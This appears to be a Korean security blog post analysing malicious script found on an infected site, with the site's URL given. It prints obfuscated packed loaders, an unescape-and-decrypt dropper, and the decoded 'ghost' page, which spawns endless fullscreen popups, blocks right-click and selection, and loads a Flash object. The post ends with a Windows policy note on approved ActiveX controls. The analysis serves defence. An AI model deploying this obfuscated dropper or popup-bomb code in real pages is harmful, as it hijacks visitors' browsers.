
security/악성코드 유포

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script

감염 사이트 : http://www.imslow.kr/ghost/index.html
* 악성 링크이니 조심하시기 바랍니다!


<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('143(58(46,41,40,45,43,44){43=58(40){65(40<41?\'\':43(153(40/41)))+((40=40%41)>35?92.166(40+29):40.169(36))};91(!\'\'.90(/^/,92)){93(40--){44[43(40)]=45[40]||43(40)}45=[58(43){65 44[43]}];43=58(){65\'\\\\57+\'};40=1};93(40--){91(45[40]){46=46.90(159 161(\'\\\\42\'+43(40)+\'\\\\42\',\'48\'),45[40])}}65 46}(\'133.98(88(88
생략


</script>
<script language="javascript">
// Returning true from window.onerror tells the browser the error has been handled,
// so no script-error dialog is shown — failures in the obfuscated payload above stay silent.
window.onerror=function(){ return true; }
</script>
<script language="JavaScript">
// Payload decoder used by the dropper below (`new Function(decrypt(unescape(...)))`).
// Two steps: (1) subtract 3 from every UTF-16 code unit, (2) reverse the result.
// y, i and r are assigned without var and therefore leak as globals — reproduced
// unchanged here because this is the sample as observed.
// @param {string} x - the already-unescape()d string supplied by the caller
// @returns {string} decoded JavaScript source, executed afterwards via mm()
function decrypt(x){
       y="";
    // step 1: shift every character down by 3 code points
    for(i=0; i<x.length; i++){
    y += String.fromCharCode(x.charCodeAt(i)-3);
    }
    r="";
    // step 2: reverse the shifted string one character at a time
    for(i=y.length-1;i>=0;i--){
    r += y.substr(i,1);
    }
    return r;
}
mm = new Function(decrypt(unescape("%3E%2C%2C%2C%2C%25D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%2899%3B%3A%3B679%3A555%3A35713%3B3%3C%3C89584%3B9748%3B6136%3C7%3C%3A69%3C6%3A77%3A5%3B91385%3A%3B%3A596%3A373%3B34%3A138%3C5%3B5%3C37%3A%3B9%3A55%3B813558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%28%3B%3A%
생략
3A8%3C613558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28%25+hsdfvhqx+hsdfvhqx+hsdfvhqx+hwluz1wqhpxfrg")));
// Executes the decoded payload; mm was created above with new Function(decrypt(unescape(...))),
// so this call is the point where the obfuscated string becomes running code.
mm();

각각의 출력이 다르다 !

1.

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1x.N(1e(1e
(생략)

2.

document.write(unescape(unescape("%253CHTML%253E%250D%250A%253CHEAD%253E%250D%250A%253CTITLE%253EHello%2520World%2520%253A%2529%2520Do%2520u%2520want%2520to%2520see%2520ghost%253F%2520%2528contact@imslow.kr%2529%253C/TITLE%253E%250D%250A%253CSCRIPT%2520language%253D%2522JavaScript%2522%253E%250D%250A%253C%
생략)));

두 함수 모두 결국은 아래와 같은 HTML 페이지를 출력한다.
 

<HTML>
<HEAD>
<TITLE>Hello World :) Do u want to see ghost? (contact@imslow.kr)</TITLE>
<SCRIPT language="JavaScript">
<!--
// try to maximize!
// Tries to make the top-level window cover the whole available screen.
// document.all selects the IE path (resizeTo); document.layers / getElementById
// covers other browsers by writing outerHeight/outerWidth directly.
// Every failure (cross-frame access, missing APIs) is swallowed.
function maximizeWindow()
{
 try {
  top.window.moveTo(0,0);
  if (document.all) {
   top.window.resizeTo(screen.availWidth,screen.availHeight);
  }
  else if (document.layers||document.getElementById) {
   // resize only when the window is smaller than the screen in either dimension
   if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
    top.window.outerHeight = screen.availHeight;
    top.window.outerWidth = screen.availWidth;
   }
  }
 } catch(e) { }
}
// Runs once while the <HEAD> script is parsed; the popup and handler loops are armed at the end of the script.
maximizeWindow();

// Handler that set_DisableRight installs on oncontextmenu / ondragstart / onselectstart.
// Stops propagation and cancels the default action through the IE-style global `event`
// (a ReferenceError elsewhere is swallowed), then returns false so the browser also
// treats the event as cancelled.
function eventIgnored()
{
 try {
  if(event) {
   event.cancelBubble = true;
   event.returnValue = false;
  }
 } catch(e)
 { }
 return false;
}

// Opens the current page (self.location) again in a new fullscreen window with all
// browser chrome disabled. Called repeatedly by try_open and twice more from the
// <BODY onunload> handler below.
// NOTE(review): the feature string is wrapped across two lines in the post
// ("loca" / "tion=no"); in the original sample it is presumably a single line.
function open_window()
{
 try {
  window.open(self.location, "_blank", "resizable=no,fullscreen=yes,toolbar=no,menubar=no,status=no,titlebar=no,loca
tion=no,directories=no");
 } catch(e) { }
}

// Popup loop: opens another copy of the page, then re-arms itself every 2000 ms,
// so new windows keep appearing for as long as the script runs.
function try_open()
{
 try {
  open_window();
  setTimeout(try_open, 2000);
 } catch(e) { }
}

// Blocks right-click, drag and text selection by pointing the three document handlers
// at eventIgnored, and re-installs them every 100 ms so they stay in place.
// The <BODY> tag below duplicates this with inline oncontextmenu/ondragstart/onselectstart.
function set_DisableRight()
{
 try {
  document.oncontextmenu = eventIgnored;
  document.ondragstart = eventIgnored;
  document.onselectstart = eventIgnored;
  setTimeout(set_DisableRight, 100);
 } catch(e)
 { }
}

// Builds and document.write()s an <object>/<embed> pair that loads ghost.swf through the
// Flash ActiveX control. The classid d27cdb6e-ae6d-11cf-96b8-444553540000 is the CLSID
// named in the post title and in the AllowedControls / Administrator Approved Controls
// policy notes at the end of the post — that policy is where an administrator decides
// whether this control may be instantiated.
// NOTE(review): the codebase assignment is broken across three lines in the post
// ('codebase="' / the fpdownload host / 'pub/shockwave/...'); presumably one string in the sample.
function fm() {
 var s = "";
 s += '<object type="application/x-shockwave-flash" ';
 s += 'classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" ';
 s += 'codebase="
http://fpdownload.macromedia.com
 s += 'pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"';
 s += 'id="ghostmovie" width="100%" height="100%">';
 s += '<param name="movie" value="ghost.swf">';
 s += '<param name="quality" value="high">'; 
 s += '<param name="menu" value="false">';
 s += '<param name="swliveconnect" value="true">';
 s += '<param name="scale" value="exactFit">';
 // <embed> fallback for non-ActiveX browsers, pointing at the same ghost.swf
 s += '<embed src="ghost.swf" quality="high" menu="false" ';
 s += 'width="100%" height="100%" swliveconnect="true" scale="exactFit" ';
 s += 'id="ghostmovie" name="ghostmovie" type="application/x-shockwave-flash" ';
 s += 'pluginspage="http://www.macromedia.com/go/getflashplayer"><\/embed>';
 s += '<\/object>';
 document.write(s);
}
// Arm both loops: a new popup every 2000 ms and handler re-installation every 100 ms.
setTimeout(try_open, 2000);
setTimeout(set_DisableRight, 100);
// -->
</SCRIPT>
</HEAD>
<BODY bgcolor=white onload="document.bgColor='black'" onunload="open_window();open_window();alert('Gotcha!\tHey man :)');" onmousedown="if(event.button==2){alert("Gotcha!");}" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="return false" ondragstart="return false" onselectstart="return false" unselectable="on" style="cursor: default;">
<SCRIPT language="JavaScript">
 fm();
</SCRIPT>
</BODY>
</HTML>

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

{D27CDB6E-AE6D-11CF-96B8-444553540000}

Updated: March 28, 2003

Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\AllowedControls

Description

Stores configuration data for the policy setting Shockwave Flash.

Change Method

To change the value of this entry, use the Group Policy Object Editor (Gpedit.msc). The corresponding policy is located in \Windows Components\Internet Explorer\Administrator Approved Controls.